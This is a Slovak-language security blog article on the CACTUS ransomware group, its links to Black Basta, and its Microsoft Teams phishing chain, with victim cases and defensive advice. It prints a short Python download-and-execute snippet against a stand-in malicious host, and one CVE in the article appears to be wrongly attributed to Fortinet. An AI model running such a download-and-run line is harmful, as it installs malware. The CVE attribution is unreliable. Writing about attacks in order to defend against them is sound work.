Kedysi Black Basta, dnes CACTUS. Phishing cez Microsoft Teams sa stáva jednou z najnebezpečnejších a najprepracovanejších metôd útoku. Tento článok ti ukáže, ako funguje nová generácia ransomwaru, prečo je kľúcové slovo Teams kritickým vektorom zneužitia vo firemnej komunikácii a ako sa môžeš účinne brániť.
? Kto je CACTUS a čo má spoločné s Black Basta?
CACTUS je ransomware-as-a-service (RaaS) skupina, ktorá sa objavila na scéne v marci 2023. Na prvý pohľad pôsobí ako nová značka, no jej postupy, použité nástroje a útokové schémy naznačujú priame prepojenie s bývalou skupinou Black Basta.
Analytici identifikovali opätovné použitie známych nástrojov, ako sú skript TotalExec.ps1 a modul BackConnect. V kombinácii s informáciami o rozklade Black Basta vo februári 2025 a verejnou výpoveąou jej lídra „Trumpa“ (ktorý priznal spoluprácu s CACTUS a zmienil platby v hodnote 500 000 – 600 000 USD), je jasné, že CACTUS predstavuje pokračovanie tejto kybernetickej línie v novom kabáte.
? Útoky cez Microsoft Teams: Tichý vektor kompromitácie
CACTUS neprichádza s novými technológiami, ale dokonale využíva to, čo poznáme a čomu dôverujeme – nástroje ako Microsoft Teams. Útok nevyzerá podozrivo, lebo prichádza cez platformu, ktorú zamestnanci denne používajú. A práve to je jeho sila.
? Typický priebeh útoku:
- Email bombing: Cieľová osoba dostane stovky nevyžiadaných emailov, čo vyvolá stres.
- Falošný Teams kontakt: Útočník sa vydáva za helpdesk z domény
onmicrosoft.com. - QR kód: Obeť ho naskenuje a dostane sa na škodlivú stránku.
- Vzdialený prístup: Inštalácia AnyDesk alebo QuickAssist umožní útočníkovi získať kontrolu.
- Python skript: Skript stiahne a spustí ransomvér a iný malvér.
- Dvojité vydieranie: Najprv krádež dát, potom šifrovanie a vyhrážka zverejnenia.
|
1 2 |
import os os.system("curl hxxps://malicious-site[.]com/payload.exe -O payload.exe && payload.exe") |
?️ Reálne prípady: Útoky, ktoré spôsobili miliónové škody
? Bishop Lifting (USA)
- Odvetvie: Priemyselné vybavenie
- Dátum: Február 2025
- Dopad: Zverejnenie dokumentov po odmietnutí zaplatiť výkupné
? BluEdge (USA)
- Odvetvie: IT služby
- Znežitý vstup: Fortinet VPN zraniteľnosť (CVE-2023-38035)
- Následok: Únik 1 TB klientskych a finančných dát
? Americké nemocnice
- Kontext: FBI varovanie (apríl 2024)
- Dôsledky: Presmerovanie ambulancií, strata prístupu k záznamom
⚡ Schneider Electric
- Odvetvie: Energetika
- Dátum: Január 2024
- Dopad: Krádež technických návrhov, výkupné 2,5 mil. USD
? Ako sa brániť pred útokmi cez Teams?
- Obmedziť externý prístup v Teams len na overené domény
- EDR/XDR riešenia na detekciu ransomvéru a podozrivých procesov
- Školenia zamestnancov na rozpoznanie phishingu
- Monitorovanie siete a logov – najmä Python a skripty
- Pravidelné aktualizácie VPN, RMM, a cloudových nástrojov
- MFA ako nevyhnutný štandard pre prihlásenia
?? Prípad z praxe: 15 minút do katastrofy
Audit vo firme s 50 zamestnancami, kde pracuje moja známa. Dostala správu cez Teams od údajnej „IT podpory“, ktorá ju pozvala do falošného kanála. Poslali jej QR kód s informáciou, že ide o aktualizáciu zabezpečenia. Klikla. Stiahla si AnyDesk. Útočníci mali do 2 minút plný prístup do jej počítača, do 15 minút šifrovali celý firemný disk vrátane zdieľaného úložiska.
Citlivé zmluvy, databázy a účtovníctvo boli nenávratne zašifrované. Firma nemala zálohy. Klasika že ? 😀 Reputácia? Poškodená. Príčina? Dôvera v známe logo. Paradoxne, ešte týždeň pred útokom absolvovala školenie o kyberbezpečnosti, no práve dôveryhodný dizajn a spôsob komunikácie jej zabránili spozornieť. O útoku sa firma dozvedela až po tom, čo nešlo otvoriť účtovný softvér. Nasledujúce dni znamenali úplný chaos – IT tím obnovoval, čo sa dalo, ale škody zostali.
Dodnes hovorí, že najviac ju zaskočilo, že útok prišiel nie emailom, ale práve cez firemný nástroj, ktorému dôverovala najviac.
Výsledok? Strata údajov, zmlúv, dôvery. Dôvod? Dôvera v firemný nástroj bez ochranných prvkov.

? Záver: Firemné nástroje ≠ bezpečné nástroje
CACTUS ukazuje, ako sofistikované môžu byť dnešné ransomvérové útoky. Zneužíva dôveru, nie zraniteľnosť systému. Microsoft Teams je dnes jeden z najväčších vektorov kompromitácie.
Firmy, ktoré nepovažujú interné nástroje za potenciálnu slabinu, sú prvé na rade. Prevencia, školenie, kontrola a technológie ako EDR sú dnes minimálnym štandardom.
Zamestnanci by mali vedieť, že hrozba neprichádza len cez podozrivý email, ale aj cez aplikácie, ktoré denne používajú.
Akékoľvek neočakávané správy v Teams by mali byť dôvodom na zvýšenú opatrnosť. Rovnako dôležité je mať nastavené interné protokoly, ako overovať identitu v digitálnom priestore. Nie všetko, čo má firemné logo, je skutočne firemné. A ak bezpečnosť nie je súčasťou firemnej kultúry, stane sa len otázkou času, kedy si vás CACTUS vyberie ako ďalší cieľ.
➔ Nepodceňuj interné nástroje. Začni konať ešte dnes.
Zdroj : Tripwire

